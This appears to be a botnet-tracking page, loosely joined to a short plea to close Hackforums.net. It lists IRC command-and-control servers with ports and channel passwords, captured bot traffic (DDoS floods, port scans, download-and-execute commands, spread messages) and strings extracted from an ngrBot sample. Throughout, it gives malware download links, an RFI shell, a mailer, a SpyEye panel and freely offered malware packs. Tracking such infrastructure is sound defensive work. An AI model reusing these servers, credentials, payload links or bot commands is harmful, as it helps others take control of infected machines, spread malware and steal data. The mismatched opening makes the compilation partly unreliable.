Hackforums.net Investigation


We are working to get Hackforums.net shut down. We feel strongly that it a website which has an undue influence on young people as well as promoting illegal computer activities such as hacking, virus spreading, manipulation of online financial services etc.

I'm not certain of what your criteria if for judging a site to be 'positive for malware'. I know that is not an easy threat to withstand and I don't blame this site for exercising caution and withdrawing the 'positive' for malware decision.

Hackforums.net - "Infecting one another with malware."


We are reporting this site for illegal activitie and it should be closed as soon as posible!

Legal internet law will clean all illegal activities and we will help realise it!

[IT Security Team]

88.86.113.239(irc botnet hosted in Czech Republic Liberec Supernetwork S.r.o)

Remote Host Port Number
88.86.113.239 31092

NICK US|computername
USER siruyuse UNIX UNIX :username
JOIN #global#
JOIN #US

Now talking in #global#
Topic On: [ #global# ] [ omtECZWQgee3/7w9aGStOwmHmYQVTJXFx68dXRhkVWUhNomgeVieycdUnnRaoait ]
Modes On: [ #global# ] [ +smntMu ]

hosting infos:
http://whois.domaintools.com/88.86.113.239

117.211.84.155(irc botnet hosted in India Bangalore O/o Dgm Bb Noc Bsnl Bangalore)

Remote Host Port Number
117.211.84.155 25343 PASS scary

NICK [USA|XP|XmWCMYN5]
USER 9583 "" "lol" :9583
NICK [USA|XP|UFdwiY47]
USER 4508 "" "lol" :4508
NICK [USA|XP|YZw7cS8u]
USER 2152 "" "lol" :2152
NICK [USA|XP|X2XUcWQU]
NICK [USA|XP|cuCVirAD]
USER 6242 "" "lol" :6242
NICK [USA|XP|bx3Iivi3]
USER 8840 "" "lol" :8840
NICK [USA|XP|fRQNcpmq]
USER 6294 "" "lol" :6294

hosting infos
http://whois.domaintools.com/117.211.84.155

204.15.252.199(irc botnet hosted in United States Henderson Trashy Media)

UPDATE:
204.15.252.199:4042

Irc Trafic:
NICK new[BEL|XP|Pig-D17A7D27]dvxotgy
USER hh "" "lol" :hh

Now talking in #newbiz#
Topic On: [ #newbiz# ] [ .down /99/106/112/81/55/59/40/125/111/122/35/108/114/121/114/116/115/106/104/122/126/121/37/69/76/117/48/113/107/125/118/126/47/108/116/84/47/102/113/71/ ]
Topic By: [ b ]
Topic: b sets topic []

hosting infos:
http://whois.domaintools.com/204.15.252.199

89.238.176.123(irc botnet hosted in United Kingdom M247 Ltd)

Remote Host Port Number
195.122.131.11 80
213.251.170.52 80
64.62.243.91 80
89.238.176.123 4042 IRCD here

Now talking in #newbiz#
Topic On: [ #newbiz# ] [ ]
Topic By: [ b ]

hosting infos:
http://whois.domaintools.com/89.238.176.123

gusan0.sin-ip.es(irc botnet hosted in United States Chicago Fdcservers.net)

Remote Host Port Number
50.7.247.10 6667

NICK NEW[XX][XP]8744609838
USER 8744 "" "TsGh" :8744
MODE NEW[XX][XP]8744609838 -d
JOIN ##spam##
PONG :irc.priv8net.com

NICK {XP\USA\698507}
USER COMPUTERNAME * 0 :COMPUTERNAME
MODE {XP\USA\698507} -ix
JOIN ##v5##
MODE ##v5## -ix
PRIVMSG ##v5## :.::[DDoS]::. Flooding 127.0.0.2:1234 with ddos.syn for 50 seconds
PRIVMSG ##v5## :.::[DDoS]::. Done with flood (0KB/sec).
NICK {XP\USA\965601}
MODE {XP\USA\965601} -ix



hosting infos:
http://whois.domaintools.com/50.7.247.10

46.17.100.229(irc botnet hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number
46.17.100.229 4443 ircd here
46.28.64.99 444
46.28.64.99 80
79.142.67.113 80

NICK N[USA|XP][vsdyciq]
USER vsdy "" "lol" :vsdy
JOIN #b0ts
PONG 422
PRIVMSG #b0ts :[Download]: Succeeded using primary method [WinInet: 279 KB]

executables:
# http://c0re.us/test.exe
# http://waterforpeople.co.cc/crypted.exe

Spyeye panel:
http://quantummechanic.cc/controlpanel/
Spyeye executable:
http://waterforpeople.co.cc/spyfud.exe.exe

hosting info:
http://whois.domaintools.com/46.17.100.229

213.229.107.27(irc botnet hosted in United Kingdom Canonical Range For Bs2-hp1-le)

Remote Host Port Number
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
85.118.137.12 80
213.229.107.27 1234 PASS xxx

NICK NEW-[USA|00|P|07451]
USER XP-1167 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|07451] -ix
JOIN #!nn! test
PONG 22 MOTD

hosting infos:
http://whois.domaintools.com/213.229.107.27

67.210.170.142(irc botnet hosted in Canada Ottawa Network Defence Intelligence Inc)

Remote Host Port Number
67.210.170.142 20000 PASS ohai

NICK cqexck
USER nnlucf "" "ftr" :nnlucf

hosting infos:
http://whois.domaintools.com/67.210.170.142

75.102.22.20(irc botnet hosted in United States Chicago Hostforweb Inc)

Remote Host Port Number
75.102.22.20 2345

NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD

hosting infos:
http://whois.domaintools.com/75.102.22.20

64.202.107.28(irc botnet hosted in United States Chicago Hostforweb Inc)

Remote Host Port Number
64.202.107.28 2345

NICK New[USA|00|P|90973]
USER XP-0539 * 0 :COMPUTERNAME
MODE New[USA|00|P|90973] -ix
JOIN #!loco!
PONG 22 MOTD

hosting infos:
http://whois.domaintools.com/64.202.107.28

72.20.14.87(irc botnet hosted in United States Staminus Communications)

Remote Host Port Number
72.20.14.87 38

JOIN #Internet#

hosting infos:
http://whois.domaintools.com/72.20.14.87

70.107.249.167(irc botnet hosted in United States New York Verizon Online Llc)

70.107.249.167:3921
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: "xvvv mssql 100 0 0 -a -r -s"

i got this info from Seb another botnet lover lol

hosting infos:
http://whois.domaintools.com/70.107.249.167

smellypussy.info(ngrBot very large irc botnet hosted in United States Henderson Trashy Media)

This botnet is very big one and the bot used for spreading is also special
alot of features inside like injection into multiple system processes,ruskill for killing processes blocking av updates , windows security updates, msn spread,ftp infection etc

Sample vas captured by Xylitol and then i helped for finding more ip's and diferent samples from same botnet

The bot is detected as Dorkbot

Here we go


Analysis from sample:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
\\.\pipe\%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj

Dns used for the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]

Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]

Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]


How to conect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81

UPDATE:
Remote Host Port Number
204.15.252.199 49287 ircd here
208.75.230.43 80
213.251.170.52 80
61.31.99.67 4042 ircd here


Chanel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol

NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh "" "lol" :hh
JOIN #newbiz#
PONG 422


Chanel pass:ngrBot

The bin is for sell in underground forums for 400$ but u can have it for free now

brainbox.dyndns.org(irc botnet hosted in United States Sparta Ispsystem At Nac)

Remote Host Port Number
213.186.33.87 80
82.146.51.173 4598


NICK n[XP-USA]855437
PONG 422
PRIVMSG ##Channel## :
09Executed Process Successfully.
USER 8554 "" "TsGh" :8554
JOIN ##Channel3##
PRIVMSG ##Channel3## :
NICK [XP-USA]561757
USER 5617 "" "TsGh" :5617
JOIN ##Channel##


hosting infos:
http://whois.domaintools.com/82.146.51.173

72.55.132.187(irc botnet hosted in Canada Zenkis.ca)

Remote Host Port Number
213.251.170.52 80
72.55.132.187 2603 PASS ngrBot
78.47.10.199 21

NICK n{US|XPa}hjcbvjl
USER hjcbvjl 0 0 :hjcbvjl
JOIN #phcrulez ngrBot
USER adi

hosting infos:
http://whois.domaintools.com/72.55.132.187

infected34.co.cc(irc botnet hosted in Germany Berlin Fast It Colocation)

ircd :infected34.co.cc:6667 PASS timu or PASS aliss

NICK [00|USA|989169]
USER XP-6593 * 0 :COMPUTERNAME
MODE [00|USA|989169] -ix
JOIN #N timu

MODE [SI|USA|00|P|79102] -ix
JOIN #test# aliss
PONG 217.79.190.39
NICK [SI|USA|00|P|79102]
USER XP-4584 * 0 :COMPUTERNAME


hosting infos:
http://whois.domaintools.com/217.79.190.39

75.102.22.40(irc botnet hosted in United States Chicago Hostforweb Inc)

Remote Host Port Number
195.122.131.8 80
204.0.5.41 80
63.135.80.224 80
63.135.80.46 80
66.220.158.11 80
75.102.22.40 2866 PASS xxx


NICK NEW-[USA|00|P|20798]
USER XP-0727 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|20798] -ix
JOIN #!nine! test
PONG 22 MOTD

hosting infos:
http://whois.domaintools.com/75.102.22.40

50mb malware samples

This is another package with diferent malwares
have fun
size=50mb



Download:
http://c65cdb0b.tubeviral.com

toxfeenyxx.sdeirc.net(phoenix bot hosted in Cyprus C & C Advanced Online Services Ltd)

Remote Host Port Number
toxfeenyxx.sdeirc.net 3674

NICK N[USA|XP][tjxcvay]
USER tjxc "" "lol" :tjxc
JOIN #phoenix selling9309239
NICK N[USA|XP][baersyl]
USER baer "" "lol" :baer


hosting infos:
http://whois.domaintools.com/46.243.8.142

homelessman.weedns.com(Mouse's botnet hosted in the whole world lol)

this is prob one of the bigest botnets still alive from years now

dns:homelessman.weedns.com
port:3305

Resolved : [homelessman.weedns.com] To [80.247.72.130]
Resolved : [homelessman.weedns.com] To 13[92.62.231.115]
Resolved : [homelessman.weedns.com] To [202.117.53.21]
Resolved : [homelessman.weedns.com] To [156.26.121.177]

DNS List:
ns.yumetairiku.co.jp:3305
virtual-mgsf.nebula.fi:3305
dell.aurius.sk:3305
cx10man.weedns.com:3305
fx010413.whyI.org:3305
gynoman.weedns.com:3305
c010x1.co.cc:3305
commgr.co.cc:3305
g.0x20.biz:3305
telephone.dd.blueline.be:3305
cx10man.weedns.com:3305
gynoman.weedns.com:3305
www.carpet-backing.com
www.comofil.it
www.iris-spa.it
www.osteriadeltorchio.it
ballslessman.weedns.com:3305
fx010413.whyi.org:3305
hr.whyi.org:3305
hikemanplace.weedns.com:3305
opmanplace.weedns.com:3305
www.usderviese.it

NICK P|hy4m13g8c
USER kv7ucu7y9 * 0 :USA|XP|601
USERHOST P|hy4m13g8c
MODE P|hy4m13g8c
JOIN #mm RSA
PRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0puSW4.pimDm1LRefR1ZyBMf0vZEvo.KMXSW1c0M3m/Fwv310uA.y6/SUz0u/OGWL5.gwJqI.6pkc9.kty0t0KWEjq.nHZN20/qQ08.asyjW/qqA8J1QcT5G1

ashland.aboutkiddies.com(irc botnet hosted in United States New York Webair Internet Development Company Inc)

Remote Host Port Number
209.200.50.75 3800 PASS hax0r
213.251.170.52 80
91.200.241.40 80

* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://91.200.241.40/dq.exe


PRIVMSG #dpi :[d="http://91.200.241.40/dq.exe" s="23552 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0


PASS hax0r..KCIK
00000010 | 206E 7B55 537C 5850 617D 6D69 696D 6567 | n{US|XPa}miimeg
00000020 | 740D 0A52 5353 5220 6D69 696D 6567 7420 | t..RSSR miimegt
00000030 | 3020 3020 3A6D 6969 6D65 6774 0D0A 5345 | 0 0 :miimegt..SE
00000040 | 4E44 2023 6E67 206E 6730 300D 0A | ND #ng ng00..

hosting infos:
http://whois.domaintools.com/209.200.50.75

46.243.8.119(irc botnet hosted in Cyprus C & C Advanced Online Services Ltd)

Remote Host Port Number
ircserver.taylor412gang.com 3941

NICK N[USA|XP][qhfpagj]
USER qhfp "" "lol" :qhfp
JOIN #apple apple57

hosting infos:
http://whois.domaintools.com/46.243.8.119

01.cybernix.info(irc botnet hosted in United States Willowbrook Psinet Inc)

Remote Host Port Number
01.cybernix.info 1750 PASS gsaxx00

NICK \00\USA\9j6m6dbn0n
USER XP-SP2 x x :COMPUTERNAME
JOIN ##pool P00L
NICK \00\USA\iky784di69


hosting infos:
http://whois.domaintools.com/154.35.64.32

95.173.179.231(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)

Remote Host Port Number
95.173.179.231 6667 PASS codr00t

MODE [USA|XP|094124] -ix
JOIN #k codr00t
PRIVMSG #k :[p2p]: Spreading to p2p folders.
PONG HTTP1.4
NICK [USA|XP|094124]
USER xfgbxix * 0 :COMPUTERNAME

hosting infos:
http://whois.domaintools.com/95.173.179.231

main.xxxxxiseviumixxxxx.info(irc botnet hosted in Germany Berlin Active Media)

Remote Host Port Number
jky.no-ip.info 3177 RAT here
main.xxxxxiseviumixxxxx.info 3211 IRCD here

NICK Sapphire{USA|XP-SP2}0300311
USER 03003114 "" "03003114" :03003114
MODE Sapphire{USA|XP-SP2}0300311
JOIN #Sapphire_2#
NICK New{USA|XP-SP2}1046453
USER 10464537 "" "10464537" :10464537
MODE New{USA|XP-SP2}1046453


hosting infos:
http://whois.domaintools.com/88.198.219.113

yesim.hoodrich.ru(irc botnet hosted in United States South Lake Tahoe Reliablehosting.com - Network Services)

Remote Host Port Number
yesim.hoodrich.ru:4042
Resolved : [yesim.hoodrich.ru] To [216.131.127.13]
216.131.127.13 4042
89.201.164.126 80

NICK new[USA|XP|COMPUTERNAME]pethrmn
USER xD "" "lol" :xD
JOIN #biznew#
PONG 422
PONG :irc.priv8net4.com

* The data identified by the following URL was then requested from the remote web server:
o http://epicbookings.com/images/jun16.exe


hosting infos:
http://whois.domaintools.com/216.131.127.13

kayits.byinter.net(irc botnet hosted in Turkey Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti)

found by tr0j3n

Remote Host Port Number
kayits.byinter.net 7107

NICK new[iRooT-XP-USA]667657
USER 3221 "" "TsGh" :3221
JOIN #!MSN! Coded
NICK [iRooT-XP-USA]008675
USER 0086 "" "TsGh" :0086
NICK [iRooT-XP-USA]049882
USER 0498 "" "TsGh" :0498


hosting infos:
http://whois.domaintools.com/94.102.1.163

70.107.249.167(irc botnet hosted in United States New York Verizon Online Llc)

70.107.249.167:3921
Nick: A4-647337362958
Username: fpairedpyoqaak
Joined Channel: #mss2 with Password mss2pass
Channel Topic for Channel #mss2: "xvvv mssql 100 0 0 -a -r -s"

i got this info from Seb another botnet lover lol

hosting infos:
http://whois.domaintools.com/70.107.249.167

qeshmjaa.zapto.org(desperate albanian hecker hosting botnet in Ireland Dublin Digiweb Ltd)

Remote Host Port Number
qeshmjaa.zapto.org 4244

NICK [iRooT-XP-USA]211081
USER 2110 "" "TsGh" :2110
JOIN #gan# sk
NICK new[iRooT-XP-USA]709534
USER 7095 "" "TsGh" :7095
NICK [iRooT-XP-USA]664288
USER 6642 "" "TsGh" :6642

hosting infos:
http://whois.domaintools.com/78.137.159.84

22mb malware samples

size 22mb
diferent malware samples inside
have fun reversing



Download:
http://8efc580b.tubeviral.com

tinker.weedns.com(irc botnet Mouse's net again)

Remote Host Port Number
tinker.weedns.com 3305 PASS secretpass

Resolved : [tinker.weedns.com] To [173.9.72.212]
Resolved : [tinker.weedns.com] To [222.124.178.155]
Resolved : [tinker.weedns.com] To [66.238.151.86]
Resolved : [tinker.weedns.com] To [188.165.200.48]
Resolved : [tinker.weedns.com] To [74.210.208.163]

NICK yf69xrls6
USER rb6c2qqku * 0 :USA|XP|115

JOIN #mm RSA
Topic On: [ #mm ] [ +yOfS7/ZgRdB.u97R71RybXB/ubyOC/gLWja.029Cg1ae4NB/TcaF4.m9cnf/dRE2M0IU0Az0JjgIw/Pu691.6bET91ANj0U. ]

193.107.16.111(irc botnet hosted in Seychelles Ideal Solution Ltd)

Remote Host Port Number
193.107.16.111 7654 PASS ngrBot
213.251.170.52 80
66.45.255.234 80

NICK n{US|XPa}cucqohu
USER cucqohu 0 0 :cucqohu
JOIN #oldgold noKIDs
PRIVMSG #oldgold :[d="http://gloimpsa.com/js/expressInstall.swf.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Fdxaxf.exe" - Download retries: 0

hosting infos:
http://whois.domaintools.com/193.107.16.111

91.215.159.137(irc botnet hosted in Netherlands Amsterdam Infinite Technologies Internet Solutions Limited)

Remote Host Port Number
112.78.8.20 80
195.122.131.3 80
213.251.170.52 80
91.215.159.137 1866 PASS ngrBot

PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/2997295683/nap.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}aytockz
USER aytockz 0 0 :aytockz
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-r9k5w9_JPG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://jardincaracolito.edu.co/facebook-profile-pic-u9v2e9_JPG"


hosting infos:
http://whois.domaintools.com/91.215.159.137

c0re.su(irc botnet hosted in Russian Federation Mir Telematiki Ltd)

Remote Host Port Number
c0re.su 4443

NICK N[USA|XP][yiowryo]
USER yiow "" "lol" :yiow
JOIN #b0ts
NICK N[USA|XP][uuobuyk]
USER uuob "" "lol" :uuob

NICK [USA-XP][ftlizjn]
USER 2844 "" "TsGh" :2844
JOIN #botz
NICK [USA-XP][qirnfam]
USER 9143 "" "TsGh" :9143
NICK [n][USA-XP][ihcnykp]
USER 2550 "" "TsGh" :2550

hosting infos:
http://whois.domaintools.com/46.17.100.229

92.241.165.115(irc botnet hosted in Russian Federation Oao Webalta)

Remote Host Port Number
213.251.170.52 80
92.241.165.115 1863 PASS ngrBot

NICK n{US|XPa}qgaqcrq
USER qgaqcrq 0 0 :qgaqcrq
JOIN #start romeo

Now talking in #start
Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ]
Topic By: [ ecu ]

hosting infos:
http://whois.domaintools.com/92.241.164.67

115.239.230.73(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host Port Number
115.239.230.73 6943 PASS laorosr
213.251.170.52 80
31.184.237.43 80
98.126.35.112 80

MODE [N00_USA_XP_1295223]
@ -ix
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 | P_1295..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3137 342E 3133 332E | rted on 174.133.
00000050 | 782E 783A 3434 3520 7769 7468 2061 2064 | x.x:445 with a d
00000060 | 656C 6179 206F 6620 3520 7365 636F 6E64 | elay of 5 second
00000070 | 7320 666F 7220 3020 6D69 6E75 7465 7320 | s for 0 minutes
00000080 | 7573 696E 6720 3235 2074 6872 6561 6473 | using 25 threads
00000090 | 2E0D 0A50 5252 564D 5347 205B 4E30 305F | ...PRRVMSG [N00_
000000A0 | 5553 415F 5850 5F31 3239 35BC B940 203A | USA_XP_1295..@ :
000000B0 | 2053 6571 7565 6E74 6961 6C20 506F 7274 | Sequential Port
000000C0 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
000000D0 | 2031 3932 2E31 3638 2E30 2E30 3A34 3435 | 192.168.0.0:445
000000E0 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
000000F0 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000100 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000110 | 3020 7468 7265 6164 732E 0D0A 5052 5256 | 0 threads...PRRV
00000120 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000130 | 3132 3935 BCB9 4020 3A20 5365 7175 656E | 1295..@ : Sequen
00000140 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
00000150 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
00000160 | 382E 3632 2E30 3A34 3435 2077 6974 6820 | 8.62.0:445 with
00000170 | 6120 6465 6C61 7920 6F66 2035 2073 6563 | a delay of 5 sec
00000180 | 6F6E 6473 2066 6F72 2030 206D 696E 7574 | onds for 0 minut
00000190 | 6573 2075 7369 6E67 2032 3020 7468 7265 | es using 20 thre
000001A0 | 6164 732E 0D0A 5052 5256 4D53 4720 5B4E | ads...PRRVMSG [N
000001B0 | 3030 5F55 5341 5F58 505F 3132 3935 BCB9 | 00_USA_XP_1295..
000001C0 | 4020 3A20 5365 7175 656E 7469 616C 2050 | @ : Sequential P
000001D0 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
000001E0 | 206F 6E20 3139 322E 302E 302E 303A 3434 | on 192.0.0.0:44
000001F0 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000200 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
00000210 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
00000220 | 3130 2074 6872 6561 6473 2E0D 0A4B 4349 | 10 threads...KCI
00000230 | 4B20 5B4E 3030 5F55 5341 5F58 505F 3132 | K [N00_USA_XP_12
00000240 | 3935 3232 335D 18E7 400D 0A72 7373 7220 | 95223]..@..rssr
00000250 | 5350 322D 3238 3520 2A20 3020 3A43 4F4D | SP2-285 * 0 :COM
00000260 | 5055 5445 524E 414D 450D 0A73 656E 6420 | PUTERNAME..send
00000270 | 236A 2C23 4D61 206F 6F6F 6F0D 0A50 5252 | #j,#Ma oooo..PRR
00000280 | 564D 5347 2023 6920 3A48 5454 5020 5345 | VMSG #i :HTTP SE
00000290 | 5420 6874 7470 3A2F 2F33 312E 3138 342E | T http://31.184.
000002A0 | 3233 372E 3433 2F35 356D 732E 6578 650D | 237.43/55ms.exe.
000002B0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002C0 | 415F 5850 5F31 3239 35BC B940 203A 2052 | A_XP_1295..@ : R
000002D0 | 616E 646F 6D20 506F 7274 2053 6361 6E20 | andom Port Scan
000002E0 | 7374 6172 7465 6420 6F6E 2031 3734 2E78 | started on 174.x
000002F0 | 2E78 2E78 3A34 3435 2077 6974 6820 6120 | .x.x:445 with a
00000300 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000310 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000320 | 2075 7369 6E67 2032 3520 7468 7265 6164 | using 25 thread
00000330 | 732E 0D0A | s...


hosting infos:
http://whois.domaintools.com/115.239.230.73

42mb malware samples

This package have alot of rats and banking trojans inside
have fun

Download:
http://c3266cfc.tubeviral.com

irc.raidzone.net(irc botnet hosted in United States Lansing Liquid Web Inc)

50.28.21.18:8890
Nick: New|AUT|1244036|XP
Username: 7665336
Joined Channel: #pedophiliac with Password YDARIO

Remote Host Port Number
50.28.21.18 7659 PASS fuck

NICK [3151|USA|XP|Z3R0x]
USER 3151 "" "lol" :3151
JOIN #pedophiliac YDARIO
PONG 422

hosting infos:
http://whois.domaintools.com/50.28.21.18

209.172.59.146(ngrBot hosted in Canada Toronto Iweb Technologies Inc)

Remote Host Port Number
209.172.59.146 5794 PASS ngrBot

213.251.170.52 80

74.53.197.4 80

NICK n{US|XPa}pvcbajf
USER pvcbajf 0 0 :pvcbajf
JOIN #butowski ngrBot
PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) - Redirected 15 domain(s)

The data identified by the following URLs was then requested from the remote web server:
http://api.wipmania.com/
http://conectaamor.com/_server/editor/images/dominios.txt

EXE File:
http://conectaamor.com/_server/editor/images/fudnew2.exe

RFI SHELL:
http://conectaamor.com/_server/editor/images/lang.php find the passwd your self

Mailer:
http://conectaamor.com/_server/editor/images/mailer.php servez vous lol

hosting infos:
http://whois.domaintools.com/209.172.59.146

ziggy.no-ip.org(botnet hosted in Canada Frantech Solutions)

Remote Host Port Number
205.185.122.148 6667 PASS nickz23
205.185.122.148 80

NICK {NEW}[USA][XP-SP2]976017
USER 4242 "" "lol" :4242
PONG :D78F0ECE
JOIN #bots

* The data identified by the following URL was then requested from the remote web server:
o http://ziggy.no-ip.org/lsass.exe


hosting infos:
http://whois.domaintools.com/205.185.122.148

jskd6c.jumpingcrab.com(ngrBot hosted in Panama Eric Szopa)

Looks like ngrBot the reptile mod made by fubar and jam3s is spreading alot

Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126]

Remote Host Port Number
184.107.143.126 2009 and 6667 PASS ngrBot
213.251.170.52 80
70.85.227.66 80

PRIVMSG #root :[HTTP]: Updated HTTP spread message to "juas juaz mira esto bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[d="http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE" s="143360 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp" - Download retries: 0
PONG :irc.sudominio.org
NICK n{US|XPa}rzvzsak
USER rzvzsak 0 0 :rzvzsak
JOIN #root 301189
PRIVMSG #root :[MSN]: Updated MSN spread interval to "1"
PRIVMSG #root :[MSN]: Updated MSN spread message to "jijiji mira :D bajalo :D http://bit.ly/kgPE5S"
PRIVMSG #root :[HTTP]: Updated HTTP spread interval to "1"


* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE
o http://www.befordsouthpointford.com/bfam/llllllllll.EXE

Crypter used to protect the bot:
C:\Users\M4x\Documents\Programmieren\PECRYPT\Client\EXECUTABLE\Loader_Stub\Release\Loader_Stub.pdb

Detection:
2/41 in virustotal


hosting infos:
http://whois.domaintools.com/184.107.143.126

212.7.214.39(ngrBot hosted in Netherlands Dediserv Dedicated Servers Sp. Z O.o)

Remote Host Port Number
195.122.131.9 80
212.7.214.16 80
213.251.170.52 80
212.7.214.39 1866 PASS ngrBot

PRIVMSG #!hot! :[DNS]: Blocked 1269 domain(s) - Redirected 0 domain(s)
PRIVMSG #!hot! :[d="http://rapidshare.com/files/3581947473/jamesbond.exe"] Error downloading file [e="12039"]
NICK n{US|XPa}gshmhma
USER gshmhma 0 0 :gshmhma
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "oh you gotta see this lol http://www.baitbook.net/facebook-profile-pic-9292-JPEG"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "5"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL http://www.baitbook.net/facebook-profile-pic-1531-JPEG"

